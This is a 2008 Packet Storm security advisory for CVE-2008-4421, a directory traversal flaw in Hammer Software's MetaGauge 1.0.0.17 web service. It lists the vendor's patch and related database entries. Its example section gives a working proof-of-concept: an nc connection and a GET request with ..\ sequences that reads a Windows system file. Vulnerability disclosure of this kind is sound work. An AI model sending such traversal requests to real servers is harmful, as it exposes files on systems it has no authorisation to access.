Lucene search
Brad AntoniewiczPACKETSTORM:70624HistoryOct 06, 2008 - 12:00 a.m.
hammer-traversal.txt
2008-10-0600:00:00
Brad Antoniewicz
packetstormsecurity.com
19
0.018 Low
EPSS
Percentile
86.6%
`Title: MetaGauge 1.0.0.17 Directory Traversal
-------------------------------------------------------------
Vendor: Hammer Software
Vendor URL: www.Hammer-Software.com
Vendor Response: Vendor has been notified and has since addressed the issue in the latest software release.
Description:
A directory traversal vulnerability exists in MetaGauge version 1.0.0.17 (and potentially below) which allows a remote user to view files local to the target server.
Example:
C:\> nc targethost 2004
GET /..\..\..\..\..\..\winnt\win.ini HTTP/1.1
Patch Information:
Hammer has addressed the issue in the latest version of MetaGauge:
http://dl.hammer-software.com/metagauge.zip
CVE: CVE-2008-4421
Credit:
Brad Antoniewicz
[email protected]
`
Related
seebug
seebug
Hammer Software MetaGauge 1.0.0.17 Directory Traversal Vulnerability
2008-10-07 00:00:00
hammer software metagauge 1.0.0.17 - Directory Traversal vulnerability
2014-07-01 00:00:00
MetaGauge Web Server目录遍历漏洞
2008-10-08 00:00:00
cve
cve
CVE-2008-4421
2008-10-07 20:00:00
prion
prion
Directory traversal
2008-10-07 20:00:00
securityvulns
securityvulns
MetaGauge 1.0.0.17 Directory Traversal
2008-10-06 00:00:00
exploitpack
exploitpack
Hammer Software MetaGauge 1.0.0.17 - Directory Traversal
2008-10-06 00:00:00
exploitdb
exploitdb
Hammer Software MetaGauge 1.0.0.17 - Directory Traversal
2008-10-06 00:00:00